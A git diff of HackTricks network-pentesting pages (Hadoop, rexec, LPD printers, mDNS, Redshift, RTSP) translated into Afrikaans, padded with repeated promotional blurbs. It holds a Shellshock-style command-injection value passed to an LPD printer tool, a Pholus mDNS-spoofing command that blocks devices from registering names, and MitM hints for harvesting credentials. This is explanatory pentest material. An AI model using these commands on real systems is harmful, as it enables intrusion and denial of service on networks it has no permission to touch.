eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslag.
-# **Basic Information** +# **Basiese Inligting** -**Apache Hadoop** is an **open-source framework** for **distributed storage and processing** of **large datasets** across **computer clusters**. It uses **HDFS** for storage and **MapReduce** for processing. +**Apache Hadoop** is 'n **open-source raamwerk** vir **verspreide stoor en verwerking** van **groot datastelle** oor **rekenaarclusters**. Dit gebruik **HDFS** vir stoor en **MapReduce** vir verwerking. -Unfortunatelly Hadoop lacks support in the Metasploit framework at the time of documentation. However, you can use the following **Nmap scripts** to enumerate Hadoop services: +Ongelukkig het Hadoop nie ondersteuning in die Metasploit-raamwerk ten tye van dokumentasie nie. Jy kan egter die volgende **Nmap-skripte** gebruik om Hadoop-dienste op te som: - **`hadoop-jobtracker-info (Port 50030)`** - **`hadoop-tasktracker-info (Port 50060)`** @@ -28,20 +26,18 @@ Unfortunatelly Hadoop lacks support in the Metasploit framework at the time of d - **`hadoop-secondary-namenode-info (Port 50090)`** -It's crucial to note that **Hadoop operates without authentication in its default setup**. However, for enhanced security, configurations are available to integrate Kerberos with HDFS, YARN, and MapReduce services. +Dit is belangrik om op te merk dat **Hadoop sonder outentifikasie in sy verstekopset werk**. Daar is egter konfigurasies beskikbaar vir verbeterde sekuriteit om Kerberos met HDFS, YARN en MapReduce-dienste te integreer.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslag.
- - diff --git a/network-services-pentesting/512-pentesting-rexec.md b/network-services-pentesting/512-pentesting-rexec.md index d455a42b8..fefd6c1fd 100644 --- a/network-services-pentesting/512-pentesting-rexec.md +++ b/network-services-pentesting/512-pentesting-rexec.md @@ -2,41 +2,39 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -It is a service that **allows you to execute a command inside a host** if you know valid **credentials** (username and password). - -**Default Port:** 512 +Dit is 'n diens wat jou toelaat om 'n bevel binne 'n gasheer uit te voer as jy geldige **legitimasie** (gebruikersnaam en wagwoord) weet. +**Verstekpoort:** 512 ``` PORT STATE SERVICE 512/tcp open exec ``` - ### [**Brute-force**](../generic-methodologies-and-resources/brute-force.md#rexec)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md b/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md index 477b7d240..397f0c918 100644 --- a/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md +++ b/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md @@ -1,27 +1,24 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-### **Introduction to LPD Protocol** +### **Inleiding tot die LPD-protokol** -In the 1980s, the **Line Printer Daemon (LPD) protocol** was developed in Berkeley Unix, which later became formalized through RFC1179. This protocol operates over port 515/tcp, allowing interactions through the `lpr` command. The essence of printing via LPD involves sending a **control file** (to specify job details and user) along with a **data file** (which holds the print information). While the control file allows the selection of **various file formats** for the data file, the handling of these files is determined by the specific LPD implementation. A widely recognized implementation for Unix-like systems is **LPRng**. Notably, the LPD protocol can be exploited to execute **malicious PostScript** or **PJL print jobs**. +In die 1980's is die **Line Printer Daemon (LPD) protokol** ontwikkel in Berkeley Unix, wat later geformaliseer is deur RFC1179. Hierdie protokol werk oor poort 515/tcp en maak interaksies moontlik deur die `lpr`-opdrag. Die essensie van drukwerk via LPD behels die stuur van 'n **beheerlêer** (om werksbesonderhede en gebruiker te spesifiseer) saam met 'n **data-lêer** (wat die drukinligting bevat). Terwyl die beheerlêer die keuse van **verskeie lêerformate** vir die data-lêer moontlik maak, word die hantering van hierdie lêers bepaal deur die spesifieke LPD-implementering. 'n Wyd erkenning implementering vir Unix-soortgelyke stelsels is **LPRng**. Merkwaardig kan die LPD-protokol uitgebuit word om **skadelike PostScript** of **PJL-drukwerkopdragte** uit te voer. -### **Tools for Interacting with LPD Printers** - -[**PRET**](https://github.com/RUB-NDS/PRET) introduces two essential tools, `lpdprint` and `lpdtest`, offering a straightforward method to interact with LPD-compatible printers. These tools enable a range of actions from printing data to manipulating files on the printer, such as downloading, uploading, or deleting: +### **Hulpmiddels vir interaksie met LPD-drukkers** +[**PRET**](https://github.com/RUB-NDS/PRET) stel twee essensiële hulpmiddels bekend, `lpdprint` en `lpdtest`, wat 'n eenvoudige metode bied om met LPD-verenigbare drukkers te interaksieer. Hierdie hulpmiddels maak 'n verskeidenheid aksies moontlik, van die druk van data tot die manipulering van lêers op die drukker, soos aflaai, oplaai of verwyder: ```python # To print a file to an LPD printer lpdprint.py hostname filename @@ -36,26 +33,23 @@ lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4' # To send a mail through the printer lpdtest.py hostname mail lpdtest@mailhost.local ``` - -For individuals interested in further exploring the realm of **printer hacking**, a comprehensive resource can be found here: [**Hacking Printers**](http://hacking-printers.net/wiki/index.php/Main_Page). +Vir individue wat belangstel om die wêreld van **drukkerhacking** verder te verken, kan 'n omvattende bron hier gevind word: [**Hacking Printers**](http://hacking-printers.net/wiki/index.php/Main_Page). # Shodan -* `port 515` +* `poort 515`
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
- - diff --git a/network-services-pentesting/5353-udp-multicast-dns-mdns.md b/network-services-pentesting/5353-udp-multicast-dns-mdns.md index 1939f4c36..14bb92b76 100644 --- a/network-services-pentesting/5353-udp-multicast-dns-mdns.md +++ b/network-services-pentesting/5353-udp-multicast-dns-mdns.md @@ -1,94 +1,86 @@ -# 5353/UDP Multicast DNS (mDNS) and DNS-SD +# 5353/UDP Multicast DNS (mDNS) en DNS-SD
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## **Basic Information** - -**Multicast DNS (mDNS)** enables **DNS-like operations** within local networks without needing a traditional DNS server. It operates on **UDP port 5353** and allows devices to discover each other and their services, commonly seen in various IoT devices. **DNS Service Discovery (DNS-SD)**, often used alongside mDNS, aids in identifying services available on the network through standard DNS queries. +## **Basiese Inligting** +**Multicast DNS (mDNS)** maak **DNS-agtige operasies** binne plaaslike netwerke moontlik sonder 'n tradisionele DNS-bediener. Dit werk op **UDP-poort 5353** en stel toestelle in staat om mekaar en hul dienste te ontdek, wat dikwels gesien word in verskeie IoT-toestelle. **DNS Service Discovery (DNS-SD)**, dikwels saam met mDNS gebruik, help om dienste wat beskikbaar is op die netwerk te identifiseer deur middel van standaard DNS-navrae. ``` PORT STATE SERVICE 5353/udp open zeroconf ``` +### **Operasie van mDNS** -### **Operation of mDNS** +In omgewings sonder 'n standaard DNS-bediener, maak mDNS dit moontlik vir toestelle om domeinname wat eindig met **.local** op te los deur die multicast-adres **224.0.0.251** (IPv4) of **FF02::FB** (IPv6) te ondervra. Belangrike aspekte van mDNS sluit 'n **Tyd-tot-Leef (TTL)** waarde in wat die geldigheid van rekords aandui en 'n **QU-bit** wat onderskei tussen unicast- en multicast-navrae. Wat sekuriteit betref, is dit noodsaaklik vir mDNS-implementasies om te verseker dat die bronadres van die pakkie ooreenstem met die plaaslike subnet. -In environments without a standard DNS server, mDNS allows devices to resolve domain names ending in **.local** by querying the multicast address **224.0.0.251** (IPv4) or **FF02::FB** (IPv6). Important aspects of mDNS include a **Time-to-Live (TTL)** value indicating record validity and a **QU bit** distinguishing between unicast and multicast queries. Security-wise, it's crucial for mDNS implementations to verify that the packet's source address aligns with the local subnet. +### **Funksionering van DNS-SD** -### **Functioning of DNS-SD** +DNS-SD fasiliteer die ontdekking van netwerkdienste deur te ondervra vir aanwysingsrekords (PTR) wat dienssoorte aan hul instansies koppel. Dienste word geïdentifiseer deur 'n **_\.\_tcp of \_\.\_udp** patroon binne die **.local** domein, wat lei tot die ontdekking van ooreenstemmende **SRV** en **TXT-rekords** wat gedetailleerde diensinligting verskaf. -DNS-SD facilitates the discovery of network services by querying for pointer records (PTR) that map service types to their instances. Services are identified using a **_\.\_tcp or \_\.\_udp** pattern within the **.local** domain, leading to the discovery of corresponding **SRV** and **TXT records** which provide detailed service information. +### **Netwerkverkenning** -### **Network Exploration** - -#### **nmap Usage** - -A useful command for scanning the local network for mDNS services is: +#### **nmap Gebruik** +'n Nuttige opdrag vir die skandering van die plaaslike netwerk vir mDNS-dienste is: ```bash nmap -Pn -sUC -p5353 [target IP address] ``` +Hierdie bevel help om oop mDNS-poorte te identifiseer en die dienste wat oor hulle geadverteer word. -This command helps identify open mDNS ports and the services advertised over them. - -#### **Network Enumeration with Pholus** - -To actively send mDNS requests and capture traffic, the **Pholus** tool can be utilized as follows: +#### **Netwerkopname met Pholus** +Om aktief mDNS-versoeke te stuur en verkeer vas te vang, kan die **Pholus**-instrument as volg gebruik word: ```bash sudo python3 pholus3.py [network interface] -rq -stimeout 10 ``` +## Aanvalle -## Attacks - -### **Exploiting mDNS Probing** - -An attack vector involves sending spoofed responses to mDNS probes, suggesting that all potential names are already in use, thus hindering new devices from selecting a unique name. This can be executed using: +### **Exploitering van mDNS Probing** +'n Aanvalvektor behels die stuur van vervalsde reaksies na mDNS-probes, wat aandui dat alle potensiële name reeds in gebruik is, en sodoende nuwe toestelle verhinder om 'n unieke naam te kies. Dit kan uitgevoer word deur gebruik te maak van: ```bash sudo python pholus.py [network interface] -afre -stimeout 1000 ``` +Hierdie tegniek blokkeer effektief nuwe toestelle om hul dienste op die netwerk te registreer. -This technique effectively blocks new devices from registering their services on the network. - -**In summary**, understanding the workings of mDNS and DNS-SD is crucial for network management and security. Tools like **nmap** and **Pholus** offer valuable insights into local network services, while awareness of potential vulnerabilities helps in safeguarding against attacks. +**Opsomming**: Dit is noodsaaklik om die werking van mDNS en DNS-SD te verstaan vir netwerkbestuur en -veiligheid. Gereedskap soos **nmap** en **Pholus** bied waardevolle insigte in plaaslike netwerkdienste, terwyl bewustheid van potensiële kwesbaarhede help om teen aanvalle te beskerm. ### Spoofing/MitM -The most interesting attack you can perform over this service is to perform a **MitM** in the **communication between the client and the real server**. You might be able to obtain sensitive files (MitM the communication with the printer) of even credentials (Windows authentication).\ -For more information check: +Die mees interessante aanval wat jy oor hierdie diens kan uitvoer, is om 'n **MitM** in die **kommunikasie tussen die kliënt en die regte bediener** uit te voer. Jy mag dalk gevoelige lêers (MitM die kommunikasie met die drukker) of selfs geloofsbriewe (Windows-verifikasie) verkry.\ +Vir meer inligting, kyk: {% content-ref url="../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md" %} [spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md](../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) {% endcontent-ref %} -## References +## Verwysings * [Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things](https://books.google.co.uk/books/about/Practical\_IoT\_Hacking.html?id=GbYEEAAAQBAJ\&redir\_esc=y)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/network-services-pentesting/5439-pentesting-redshift.md b/network-services-pentesting/5439-pentesting-redshift.md index f843eb956..6095293d4 100644 --- a/network-services-pentesting/5439-pentesting-redshift.md +++ b/network-services-pentesting/5439-pentesting-redshift.md @@ -2,32 +2,32 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks-repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-repo](https://github.com/carlospolop/hacktricks-cloud)**.
-## Basic Information +## Basiese Inligting -This port is used by **Redshift** to run. It's basically an AWS variation of **PostgreSQL**. +Hierdie poort word deur **Redshift** gebruik om te loop. Dit is basies 'n AWS-variante van **PostgreSQL**. -For more information check: +Vir meer inligting, kyk na: {% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-services/aws-databases/aws-redshift-enum" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks-repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-repo](https://github.com/carlospolop/hacktricks-cloud)**.
diff --git a/network-services-pentesting/554-8554-pentesting-rtsp.md b/network-services-pentesting/554-8554-pentesting-rtsp.md index b226a0e9c..95c725f8b 100644 --- a/network-services-pentesting/554-8554-pentesting-rtsp.md +++ b/network-services-pentesting/554-8554-pentesting-rtsp.md @@ -2,51 +2,48 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te 